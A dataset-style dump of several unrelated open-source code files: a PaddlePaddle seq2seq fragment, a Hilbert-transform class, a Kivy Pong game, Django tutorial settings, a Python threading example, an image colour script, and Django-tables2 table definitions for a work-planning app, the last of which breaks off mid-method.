decoder.state_cell.update_states()
out = fluid.layers.fc(input=h,
size=target_dict_dim,
bias_attr=True,
act='softmax')
decoder.output(out)
label = fluid.layers.data(
name='label_sequence', shape=[1], dtype='int64', lod_level=1)
cost = fluid.layers.cross_entropy(input=decoder(), label=label)
avg_cost = fluid.layers.mean(x=cost)
feeding_list = ["source_sequence", "target_sequence", "label_sequence"]
return avg_cost, feeding_list
else:
# Inference
init_ids = fluid.layers.data(
name="init_ids", shape=[1], dtype="int64", lod_level=2)
init_scores = fluid.layers.data(
name="init_scores", shape=[1], dtype="float32", lod_level=2)
# A beam search decoder
decoder = BeamSearchDecoder(
state_cell=state_cell,
init_ids=init_ids,
init_scores=init_scores,
target_dict_dim=target_dict_dim,
word_dim=embedding_dim,
input_var_dict={
'encoder_vec': encoded_vector,
'encoder_proj': encoded_proj
},
topk_size=50,
sparse_emb=True,
max_len=max_length,
beam_size=beam_size,
end_id=1,
name=None)
decoder.decode()
translation_ids, translation_scores = decoder()
feeding_list = ["source_sequence"]
return translation_ids, translation_scores, feeding_list
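# Hedged usage sketch (added for illustration; the hyperparameter values below
# are assumptions, not taken from the accompanying training script):
if __name__ == '__main__':
    avg_cost, feed_order = seq_to_seq_net(
        embedding_dim=512,
        encoder_size=512,
        decoder_size=512,
        source_dict_dim=30000,
        target_dict_dim=30000,
        is_generating=False,
        beam_size=4,
        max_length=50)
    # feed_order lists the data layer names to feed during training
    print(feed_order)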
|
apache-2.0
| -6,780,336,246,658,529,000 | 39.140909 | 79 | 0.576265 | false | 3.956541 | false | false | false |
giruenf/GRIPy
|
algo/spectral/Hilbert.py
|
1
|
2141
|
# -*- coding: utf-8 -*-
#
# Class for dealing with the analytic signal
# Universidade Estadual do Norte Fluminense - UENF
# Laboratório de Engenharia de Petróleo - LENEP
# Grupo de Inferência em Reservatório - GIR
# Adriano Paulo Laes de Santana
# September 12th, 2017
#
# The following code is based on
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.hilbert.html
import numpy as np
from scipy.signal import hilbert
class HilbertTransform(object):
def __init__(self, real_signal, sampling):
self._fs = 1 / sampling
self._analytic_signal = hilbert(real_signal)
self._amplitude_envelope = np.abs(self._analytic_signal)
self._instantaneous_phase = np.unwrap(np.angle(self._analytic_signal))
self._instantaneous_frequency = (np.diff(self._instantaneous_phase) /
(2.0 * np.pi) * self._fs)
self._instantaneous_frequency = np.insert(self._instantaneous_frequency, 0, np.nan)
@property
def analytic_signal(self):
return self._analytic_signal
@analytic_signal.setter
def analytic_signal(self, value):
raise Exception('')
@analytic_signal.deleter
def analytic_signal(self):
raise Exception('')
@property
def amplitude_envelope(self):
return self._amplitude_envelope
@amplitude_envelope.setter
def amplitude_envelope(self, value):
raise Exception('')
@amplitude_envelope.deleter
def amplitude_envelope(self):
raise Exception('')
@property
def instantaneous_phase(self):
return self._instantaneous_phase
@instantaneous_phase.setter
def instantaneous_phase(self, value):
raise Exception('')
@instantaneous_phase.deleter
def instantaneous_phase(self):
raise Exception('')
@property
def instantaneous_frequency(self):
return self._instantaneous_frequency
@instantaneous_frequency.setter
def instantaneous_frequency(self, value):
raise Exception('')
@instantaneous_frequency.deleter
def instantaneous_frequency(self):
raise Exception('')
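# Hedged usage sketch (added for illustration, not part of the original module):
# build the analytic signal of a 10 Hz sine sampled at 1 kHz and inspect the
# derived quantities exposed by the properties above.
if __name__ == '__main__':
    t = np.arange(0.0, 1.0, 0.001)            # 1 s of data at 1 kHz
    sine = np.sin(2.0 * np.pi * 10.0 * t)     # 10 Hz test tone
    ht = HilbertTransform(sine, sampling=0.001)
    print(ht.amplitude_envelope.max())        # close to 1.0 for a unit sine
    print(ht.instantaneous_frequency[1:5])    # approximately 10 Hz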
|
apache-2.0
| 9,056,039,645,876,526,000 | 27.878378 | 91 | 0.669162 | false | 3.729494 | false | false | false |
k-yak/kivy_breakout
|
pong/main.py
|
1
|
3115
|
import kivy
kivy.require('1.1.3')
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty,\
ObjectProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.uix.floatlayout import FloatLayout
class Pong(FloatLayout):
pass
class PongPaddle(Widget):
score = NumericProperty(0)
max = 5
cur = 0
def bounce_ball(self, ball):
if self.collide_widget(ball):
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 10)
bounced = Vector(-1 * vx, vy)
if self.max > self.cur:
vel = bounced * 1.1
ball.velocity = vel.x, vel.y + offset
self.cur += 1
else:
ball.velocity = bounced.x, bounced.y + offset
class PongBall(Widget):
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
def serve_ball(self, vel=(4, 0)):
self.ball.center = self.center
self.ball.velocity = vel
def update(self, dt):
self.ball.move()
        # bounce off paddles
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
#bounce ball off bottom or top
if (self.ball.y < self.y) or (self.ball.top > self.top):
self.ball.velocity_y *= -1
        # went off to a side to score a point?
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel=(4, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel=(-4, 0))
def on_touch_move(self, touch):
if touch.x < self.width / 3:
if (touch.y + self.player1.height / 2) > self.height:
self.player1.center_y = self.height - (self.player1.height / 2)
else:
if (touch.y - self.player1.height / 2) < 0:
self.player1.center_y = self.player1.height / 2
else:
self.player1.center_y = touch.y
if touch.x > self.width - self.width / 3:
if (touch.y + self.player2.height / 2) > self.height:
self.player2.center_y = self.height - (self.player2.height / 2)
else:
if (touch.y - self.player2.height / 2) < 0:
self.player2.center_y = self.player2.height / 2
else:
self.player2.center_y = touch.y
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0 / 60.0)
return game
if __name__ in ('__main__', '__android__'):
PongApp().run()
|
mit
| -4,741,882,946,873,738,000 | 28.262136 | 79 | 0.545746 | false | 3.568156 | false | false | false |
AlphaNerd80/Lists
|
superlists/settings.py
|
1
|
2067
|
"""
Django settings for superlists project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xmnw6xn$lz)3i1v17lor83lls37&&z-9i@+xasb^f-88h7ew1c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lists',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'superlists.urls'
WSGI_APPLICATION = 'superlists.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
|
mit
| -1,529,950,277,581,714,700 | 23.607143 | 71 | 0.727141 | false | 3.291401 | false | false | false |
Moggi/python-playground
|
queues_thread.py
|
1
|
1510
|
# From tutorialspoint.com about Python Multithreaded Programming
# https://www.tutorialspoint.com/python/python_multithreading.htm
# !/usr/bin/python
import Queue
import threading
import time
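# Note (added): this script targets Python 2; on Python 3 the module is named
# "queue", so the import above and Queue.Queue(10) below would use queue.Queue(10).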
exitFlag = 0
class myThread (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("Starting " + self.name)
process_data(self.name, self.q)
print("Exiting " + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
data = q.get()
queueLock.release()
print("%s processing %s" % (threadName, data))
else:
queueLock.release()
time.sleep(1)
threadList = ["Thread-1", "Thread-2", "Thread-3"]
nameList = ["One", "Two", "Three", "Four", "Five"]
queueLock = threading.Lock()
workQueue = Queue.Queue(10)
threads = []
threadID = 1
# Create new threads
for tName in threadList:
thread = myThread(threadID, tName, workQueue)
thread.start()
threads.append(thread)
threadID += 1
# Fill the queue
queueLock.acquire()
for word in nameList:
workQueue.put(word)
queueLock.release()
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
# Wait for all threads to complete
for t in threads:
t.join()
print("Exiting Main Thread")
|
gpl-2.0
| 3,738,729,254,467,271,700 | 21.205882 | 65 | 0.64106 | false | 3.447489 | false | false | false |
luckydonald/shairport-decoder
|
examples/image-average.py
|
1
|
1351
|
# -*- coding: utf-8 -*-
__author__ = 'luckydonald'
from luckydonaldUtils.logger import logging # pip install luckydonald-utils
logger = logging.getLogger(__name__)
from PIL import Image
import sys
from luckydonaldUtils.images.color import most_frequent_color
def average_colour(image):
colour_tuple = [None, None, None]
for channel in range(3):
# Get data for one channel at a time
pixels = image.getdata(band=channel)
values = []
for pixel in pixels:
values.append(pixel)
colour_tuple[channel] = sum(values) / len(values)
return tuple(colour_tuple)
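def _average_colour_demo():
    # Hedged demo (added, not part of the original script): a solid-colour
    # image should average back to exactly its own colour.
    img = Image.new("RGB", (4, 4), (10, 20, 30))
    assert average_colour(img) == (10, 20, 30)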
def save(name, integer, image=None, color=None):
"""
DEBUG FUNCTION
WITH CAPSLOCK DESCRIPTION
:param name:
:param integer:
:param image:
:param color:
:return:
"""
if image:
image.save(name.replace(".png", "export-{}.png".format(integer)))
if color:
sample = Image.new("RGB", (200, 200,), color)
sample.save(name.replace(".png", "export-{}.png".format(integer)))
picture = "Bildschirmfoto 2015-09-15 um 17.37.49"
path = "/Users/luckydonald/Desktop/{}.png".format(picture)
def main():
image = Image.open(path)
max_colors = 10
#if "mode" in sys.argv:
results = most_frequent_color(image, colors=max_colors)
#result2 = average_colour(image)
for i in range(0, max_colors):
save(path, i+1, color=results[i][1])
if __name__ == "__main__":
main()
|
lgpl-3.0
| 7,137,069,983,716,982,000 | 21.147541 | 76 | 0.684678 | false | 2.862288 | false | false | false |
hkarl/svpb
|
arbeitsplan/tables.py
|
1
|
41071
|
# -*- coding: utf-8 -*-
"""
Collect all the tables and column types relevant for django_tables2 here.
"""
import unicodedata
import django_tables2
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.html import escape, format_html
from django.utils.safestring import mark_safe
from django_tables2.utils import A # alias for Accessor
import models
####################################
# Colum Types
####################################
class RadioButtonTable (django_tables2.Table):
def render_radio(self, fieldname, choices, buttontexts, **kwargs):
if 'bound_row' in kwargs:
record = kwargs['bound_row']._record
if 'record' in kwargs:
record = kwargs['record']
try:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record['id'],
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if record[fieldname] == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
except TypeError:
tmp = '\n'.join([
format_html(u"""
<label class="btn {4} {5}">
<input type="radio" name="{0}_{1}" value="{2}"> {3}
</label>
""",
fieldname,
record.id,
choice[0],
choice[1],
buttontexts[choice[0]],
" active" if getattr(record,fieldname) == choice[0] else "",
)
for (counter, choice) in enumerate(choices)])
return mark_safe(u"""<div class="btn-group-vertical" data-toggle="buttons">""" +
tmp +
u"""</div>""")
class KontaktColumn(django_tables2.columns.Column):
"""Pass an accessor to a user object,
this will be rendered with first and last name
as well as clickable email link.
"""
def __init__(self, *args, **kwargs):
if (('order_by' not in kwargs) and
('accessor' in kwargs)):
kwargs['order_by'] = (kwargs['accessor']+'.last_name',
kwargs['accessor']+'.first_name',
)
## print kwargs['order_by'], type(kwargs['order_by'])
## print kwargs['accessor'], type(kwargs['accessor'])
super(KontaktColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value
return mark_safe(u'{1} {2}{0}'.format(
(u' <a href="mailto:{0}">'
u'<span class="glyphicon glyphicon-envelope">'
u'</span></a>'.format(value.email)
if value.email
else ""),
value.first_name,
value.last_name,
))
class DeleteIconColumn(django_tables2.columns.Column):
"""Show a delete icon for a particular entry
"""
urlBase = "/"
def __init__(self, *args, **kwargs):
if "urlBase" in kwargs:
self.urlBase = kwargs.pop("urlBase")
print "kwargs: ", kwargs
super(DeleteIconColumn, self).__init__(*args, **kwargs)
def render(self, value):
# print value, type(value)
return mark_safe(u'<a href="{}/{}">'
u'<span class="glyphicon glyphicon-trash">'
u'</a>'.format(self.urlBase,
(value)),
)
class ValuedCheckBoxColumn(django_tables2.columns.Column):
"""A checkbox column where a pair of values is expected:
name and whether the box is checked or not.
    Control tags (integers, not strings!):
-1: show no field
0: unchecked checkbox
1: checked checkbox
"""
def render(self, value):
if value[0] == -1:
return ""
if len(value) > 2:
text = value[2]
else:
text = ""
return mark_safe(u'<input type="checkbox" value="1" name="' +
escape(value[1]) +
'" ' +
("checked" if value[0]==1 else "") +
'/>' + text
)
class IntegerEditColumn(django_tables2.columns.Column):
"""A Column type to allow editing of a single integer value
value should be a tuple: first entry the value to display/edit,
second entry the id/name of the inputbox
"""
def render(self, value):
try:
res = format_html('<input type="" value="{}" name="{}" />',
value[0],
value[1],
)
except Exception as e:
# sometimes, we get a None as value; not sure why and when :-/ ?
# print "Exc2: ", e
# print value
res = ""
# print "IEC: ", res
return res
class TextareaInputColumn (django_tables2.columns.Column):
def render(self, value):
# print "render: ", value, self.__dict__
return mark_safe (u'<input class="textinput textInput" id="id_bemerkungVorstand" maxlength="20" name="bemerkungVorstand" placeholder="Bemerkung Vorstand" value="'
+ escape (value) +
u'" type="text" />'
)
class RequiredAssignedColumn (django_tables2.columns.Column):
"""
A column used by the stundenplan survey table.
Renders both required and assigned numbers in one cell.
"""
def render(self, value):
# print value
try:
r = mark_safe(str(value['required']) +
" / " + str(value['zugeteilt']))
except TypeError:
r = ""
return r
class LinkedColumn(django_tables2.columns.Column):
"""
    A column that renders a simple <a href>,
assuming a tuple of values
"""
def render(self, value):
text, link = value
if text:
return mark_safe(u"<a href={0}>{1}</a>".format(link, text))
else:
return "-"
##############################
## Table factories
##############################
def TableFactory (name, attrs, l, meta={}):
"""takes
- a name for the new django_tables2 class
- a dictoranry with column_name: column_types
- a list of data to be used for the table
return klass
"""
metadict = dict(attrs={"class":"paleblue",
"orderable":"True",
# "width":"90%"
})
metadict.update(meta)
attrs['Meta'] = type('Meta',
(),
metadict,
)
klass = type(name, (django_tables2.Table,), attrs)
t = klass(l)
return t
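# Hedged usage sketch (added; "DemoTable" and its columns are made-up names):
# build a throw-away table class directly from plain dictionaries.
#
# demo_table = TableFactory(
#     "DemoTable",
#     {'aufgabe': django_tables2.Column(verbose_name="Aufgabe"),
#      'stunden': django_tables2.Column(verbose_name="Stunden")},
#     [{'aufgabe': 'Platzdienst', 'stunden': 3}])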
##############################
def NameTableFactory (name, attrs, l, meta=None,
kontakt=None):
"""
    A factory for django_tables2 tables with dynamic columns.
    Always adds a Nachname, Vorname column to the given attributes
"""
if kontakt:
nameattrs = {'kontakt': KontaktColumn(
accessor=kontakt[0],
verbose_name=kontakt[1],
empty_values=(),
),
}
else:
nameattrs = {'last_name': django_tables2.Column(verbose_name="Nachname"),
'first_name': django_tables2.Column(verbose_name="Vorname"),
}
nameattrs.update(attrs)
# we need to construct the meta field to ensure that the names are shown correctly:
if not meta:
if kontakt:
meta = {'sequence': ('kontakt',
'...',
)}
else:
meta = {'sequence': ('last_name',
'first_name',
'...')}
return TableFactory(name, nameattrs, l,
meta=meta
)
##############################
def StundenplanTableFactory(l, showStunden=True):
"""
A factory to produce a table with aufgaben and uhrzeiten columns.
"""
newattrs = {}
if showStunden:
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
newattrs['u'+str(i)] = RequiredAssignedColumn(
accessor='u'+str(i),
verbose_name=str(i)+'-'+str(i+1)
)
newattrs['aufgabe'] = django_tables2.Column(accessor='aufgabe')
newattrs['gruppe'] = django_tables2.Column(accessor='gruppe',
verbose_name="Aufgabengruppe")
newattrs['gemeldet'] = django_tables2.Column(accessor='gemeldet',
verbose_name="# Meldungen")
newattrs['required'] = django_tables2.Column(accessor='required',
verbose_name="# Anforderungen")
newattrs['zugeteilt'] = django_tables2.Column(accessor='zugeteilt',
verbose_name ="# Zuteilungen")
newattrs['editlink'] = django_tables2.Column(accessor="editlink",
verbose_name="Zuteilen")
newattrs['stundenplanlink'] = django_tables2.Column(accessor="stundenplanlink",
verbose_name="Stundenplan")
t = TableFactory ("Stundenplan",
newattrs, l,
meta = {'sequence': ('aufgabe', 'gruppe', # 'id',
'editlink', 'stundenplanlink',
'required', 'gemeldet', 'zugeteilt',
'...',
)})
return t
def StundenplanEditFactory(l, aufgabe):
"""
    Produce a table with persons as rows and uhrzeiten as columns.
Checkboxes in the uhrzeit columns.
"""
newattrs = {}
    # values obtained from views/StundenplaeneEdit:
newattrs['anzahl'] = IntegerEditColumn(accessor='anzahl',
verbose_name="Anzahl ZUSÄTZLICHE Helfer",
empty_values=(),)
for i in range(models.Stundenplan.startZeit,
models.Stundenplan.stopZeit+1):
# print '----- ', i
try:
benoetigt = aufgabe.stundenplan_set.filter(uhrzeit__exact=i)[0].anzahl
# benoetigt = aufgabe.benoetigte_Anzahl(i)
except Exception as e:
print "eX: ", e
benoetigt = 0
# print benoetigt
zugewiesen = sum([z.zusatzhelfer + 1
for z in aufgabe.zuteilung_set.filter(stundenzuteilung__uhrzeit=i)])
# print zugewiesen
newattrs['u'+str(i)] = ValuedCheckBoxColumn(accessor='u'+str(i),
# verbose_name=str(i)+'-'+str(i+1),
verbose_name=mark_safe('{} - {}'
'<span style="font-weight:normal">'
'<br> ({} / {})'
'</span>'.format(
i, i+1, benoetigt, zugewiesen),
))
return NameTableFactory("StundenplanEdit",
newattrs, l,
meta={'sequence': ('last_name',
'first_name',
'anzahl',
'...')}
)
##############################
class AufgabenTable (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
quickmeldung = django_tables2.Column(
verbose_name="Quickmeldung",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_quickmeldung(self, record):
user = self.context["request"].user
try:
meldung = record.meldung_set.get(melder=user)
meldung_exists = (meldung.bemerkung != models.Meldung.MODELDEFAULTS['bemerkung'] or
meldung.prefMitglied != models.Meldung.MODELDEFAULTS['prefMitglied'])
except:
meldung_exists = False
return mark_safe('<a href="{}"> <i class="fa fa-hand-o-up fa-fw"></i></a> {}'.format(
reverse('arbeitsplan-quickmeldung', args=[record.id]),
'<i class="fa fa-check fa-fw"></i>' if meldung_exists else "",
))
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
"quickmeldung",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableTeamlead (django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"bemerkung",
"verantwortlicher",
)
exclude = ("meldungen", "zuteilungen", )
class AufgabenTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="verantwortlich",
verbose_name="Verantwortlicher")
id = django_tables2.LinkColumn(
'arbeitsplan-aufgabenEdit',
args=[A('pk')],
verbose_name="Editieren/ Löschen")
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
orderable=False,
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
orderable=False,
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
orderable=False,
)
def render_meldungen(self, record):
# return record.meldung_set.count()
return record.numMeldungen()
def render_zuteilungen(self, record):
return record.zuteilung_set.count()
def render_fehlende_zuteilungen(self, record):
return record.anzahl - record.zuteilung_set.count()
class Meta:
model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields=("aufgabe", "datum",
# django_tables2.A("verantwortlich.last_name"),
# "gruppe", "anzahl", "bemerkung")
fields = ("id",
"gruppe", "aufgabe", "datum",
"stunden",
"anzahl",
"meldungen",
"zuteilungen", "fehlende_zuteilungen",
"bemerkung",
'verantwortlicher',
)
        # TODO: anzahl probably has to be converted
        # to the number of FREE slots!?!?
class AufgabengruppeTable(django_tables2.Table):
id = django_tables2.LinkColumn('arbeitsplan-aufgabengruppeEdit',
args=[A('pk')],
verbose_name="Editieren",
)
verantwortlich = KontaktColumn()
class Meta:
model = models.Aufgabengruppe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'verantwortlich', 'bemerkung', 'id', )
# exclude = ('id',)
########################
class StundenplanTable (django_tables2.Table):
id = django_tables2.LinkColumn ('arbeitsplan-stundenplaeneEdit',
args=[A('id'),],
verbose_name="Stundenplan editieren")
aufgabe = django_tables2.Column (accessor='aufgabe')
gruppe = django_tables2.Column (accessor='gruppe__gruppe', verbose_name="Aufgabengruppe")
u0 = django_tables2.Column (accessor='u0', verbose_name='0-1')
u1 = django_tables2.Column (accessor='u1', verbose_name='0-1')
u2 = django_tables2.Column (accessor='u2', verbose_name='0-1')
u3 = django_tables2.Column (accessor='u3', verbose_name='0-1')
u4 = django_tables2.Column (accessor='u4', verbose_name='0-1')
u5 = django_tables2.Column (accessor='u5', verbose_name='0-1')
u6 = django_tables2.Column (accessor='u6', verbose_name='0-1')
u7 = django_tables2.Column (accessor='u7', verbose_name='0-1')
u8 = django_tables2.Column (accessor='u8', verbose_name='0-1')
u9 = django_tables2.Column (accessor='u9', verbose_name='0-1')
u10 = django_tables2.Column (accessor='u10', verbose_name='0-1')
u11 = django_tables2.Column (accessor='u11', verbose_name='0-1')
u12 = django_tables2.Column (accessor='u12', verbose_name='0-1')
u13 = django_tables2.Column (accessor='u13', verbose_name='0-1')
u14 = django_tables2.Column (accessor='u14', verbose_name='0-1')
u15 = django_tables2.Column (accessor='u15', verbose_name='0-1')
u16 = django_tables2.Column (accessor='u16', verbose_name='0-1')
u17 = django_tables2.Column (accessor='u17', verbose_name='0-1')
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
# fields = ('aufgabe', 'gruppe', 'id', )
##############################
class ZuteilungTable(django_tables2.Table):
## verantwortlicher = django_tables2.Column(
## accessor="aufgabe.verantwortlich.last_name",
## verbose_name="Verantwortlicher")
verantwortlicher = KontaktColumn(
accessor="aufgabe.kontakt",
verbose_name="Verantwortlicher",
orderable=False,
)
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
studenString = django_tables2.Column(
verbose_name="Zeiten",
accessor='stundenString',
)
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher', 'datum',
# 'stundenString',
)
class ZuteilungTableVorstand(django_tables2.Table):
verantwortlicher = KontaktColumn(
accessor="aufgabe.verantwortlich",
verbose_name="Verantwortlicher")
datum = django_tables2.Column(
accessor="aufgabe.datum",
verbose_name="Datum")
ausfuehrer = KontaktColumn(accessor="ausfuehrer",
verbose_name="Ausführer")
deleteColumn = DeleteIconColumn(
urlBase ='/arbeitsplan/zuteilungDelete',
accessor="id",
verbose_name="Löschen")
class Meta:
model = models.Zuteilung
attrs = {"class": "paleblue"}
fields = ("aufgabe", 'verantwortlicher',
'datum', 'ausfuehrer',
'deleteColumn')
##############################
class MeldungListeTable(django_tables2.Table):
"""A table to only display all Meldungen of a user.
"""
aufgabenGruppe = django_tables2.Column(accessor="aufgabe.gruppe.gruppe",
verbose_name="Aufgabengruppe")
aufgabeName = django_tables2.Column(accessor="aufgabe.aufgabe",
verbose_name="Aufgabe")
aufgabenDatum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
class Meta:
model = models.Meldung
attrs = {"class": "paleblue"}
fields = ("aufgabenGruppe",
"aufgabeName",
"aufgabenDatum",
"prefMitglied",
"bemerkung",
)
exclude = ("id", "erstellt", "veraendert",
"prefVorstand", "bemerkungVorstand",
)
class MeldungTable(RadioButtonTable):
"""A table to edit Meldungen.
"""
# id = django_tables2.Column ()
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung",
empty_values=(),
)
anzahl = django_tables2.Column(
verbose_name="Benötigte Helfer",
empty_values=(),
)
meldungen = django_tables2.Column(
verbose_name="Vorliegende Meldungen",
empty_values=(),
)
zuteilungen = django_tables2.Column(
verbose_name="Erfolgte Zuteilungen",
empty_values=(),
)
fehlende_zuteilungen = django_tables2.Column(
verbose_name="Noch offene Zuteilungen",
empty_values=(),
)
def render_aufgabe(self, value, record):
aufgabe = record['aufgabeObjekt']
tooltext = mark_safe(u'Verantwortlicher: {0} {1}{2}'.format(
aufgabe.verantwortlich.first_name,
aufgabe.verantwortlich.last_name,
u', Bemerkung: {0}'.format(
aufgabe.bemerkung) if aufgabe.bemerkung else '',
))
tmp = mark_safe(
u'<div class="tooltip-demo">'
'<a href="{0}"'
'data-toggle="tooltip"'
'title="{2}"'
'>{1}</a></div>'.format(
'#',
value,
tooltext,
)
)
return tmp
def render_prefMitglied(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
fieldname="prefMitglied",
record=record,
)
def render_bemerkung(self, value, record, bound_row):
# print record
# print bound_row
tmp = format_html(
u"""<textarea class="textinput textInput"
id="id_bemerkung_{0}" name="bemerkung_{0}"
placeholder="Bemerkung eingeben" rows=6>{1}</textarea>""",
str(record['id']),
record['bemerkung'] if record['bemerkung'] else ""
)
return tmp
class Meta:
# model = models.Aufgabe
attrs = {"class": "paleblue"}
fields = ('gruppe', 'aufgabe', 'datum',
'stunden',
'anzahl',
"meldungen",
'bemerkung',
'prefMitglied')
exclude = ("fehlende_zuteilungen", 'zuteilungen')
class MeldungTableVorstand (RadioButtonTable):
aufgabe = django_tables2.Column(accessor="aufgabe",
verbose_name="Aufgabe")
gruppe = django_tables2.Column(accessor="aufgabe.gruppe",
verbose_name="Aufgabengruppe")
datum = django_tables2.Column(accessor="aufgabe.datum",
verbose_name="Datum")
stunden = django_tables2.Column(accessor="aufgabe.stunden",
verbose_name="Umfang (h)")
prefMitglied = django_tables2.Column(accessor="prefMitglied",
verbose_name="Vorlieben Melder",
empty_values=(),
)
bemerkung = django_tables2.Column(accessor="bemerkung",
verbose_name="Bemerkung Melder",
empty_values=(),
)
## melder_last = django_tables2.Column (accessor="melder.last_name",
## verbose_name="Melder Nachname")
## melder_first = django_tables2.Column (accessor="melder.first_name",
## verbose_name="Melder Vorname")
melder = KontaktColumn(accessor="melder",
verbose_name="Melder",
# order_by=("melder.last_name", "melder.first_name"),
)
## bemerkungVorstand = django_tables2.Column (accessor="bemerkungVorstand",
## verbose_name="Bemerkung Vorstand",
## empty_values=(),
## )
bemerkungVorstand = django_tables2.Column(
empty_values=(),
verbose_name="Bemerkungen des Vorstandes")
prefVorstand = django_tables2.Column(
accessor="prefVorstand",
verbose_name="Vorlieben des Vorstandes",
empty_values=(),
)
def render_prefVorstand(self, value, record):
return self.render_radio(
choices=models.Meldung.PRAEFERENZ,
buttontexts=models.Meldung.PRAEFERENZButtons,
